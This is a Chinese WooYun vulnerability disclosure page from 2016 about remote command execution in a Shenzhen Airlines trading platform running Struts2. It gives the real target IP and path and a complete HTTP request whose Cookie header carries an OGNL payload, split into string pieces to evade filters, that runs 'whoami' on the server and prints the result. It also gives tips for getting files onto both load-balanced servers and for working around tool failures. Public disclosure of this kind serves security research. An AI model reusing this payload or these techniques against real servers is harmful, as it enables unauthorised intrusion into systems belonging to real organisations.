首页 >> 网络安全 >>漏洞库 >> 深圳航空某交易平台远程执行漏洞
详细内容

深圳航空某交易平台远程执行漏洞

漏洞概要

缺陷编号:WooYun-2016-0218722

漏洞标题:深圳航空某交易平台远程执行漏洞

相关厂商:深圳航空

漏洞作者:艺术家

提交时间:2016-06-14 09:48

公开时间:2016-06-20 15:50

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

Tags标签:

漏洞详情

披露状态:

2016-06-14: 细节已通知厂商并且等待厂商处理中
2016-06-14: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

ST2这里有一个地方需要突破一下,用工具是不行的。漏洞地址:http://113.108.100.142/weballiance/cooperateCode!goSearchDemo255_300.action

1.jpg

存在漏洞。查看下主机名。

2.jpg


POST /weballiance/cooperateCode!goSearchDemo255_300.action?selColor=blue&weballiancecode=L20120515152239892420 HTTP/1.1<br>

User-Agent: Mozilla/5.0 (baidu spider)<br>

Content-Type: application/x-www-form-urlencoded<br>

Accept-Encoding: gzip, deflate<br>

Content-Length: 624<br>

Host: 113.108.100.142<br>

Connection: Keep-Alive<br>

Pragma: no-cache<br>

Cookie:redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27whoami%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}

ppsc2\shenzhenair

这里有2个负载均衡,也有一些防护设备。上传文件请上传两次才能保证每台上面都有上传文件。

3.jpg


这里工具不能执行dir 命令。因为有\ /的问题,所以要自己去提交。(这个很基础,也很使用,在7.0下面经常会遇到这个问题)代码: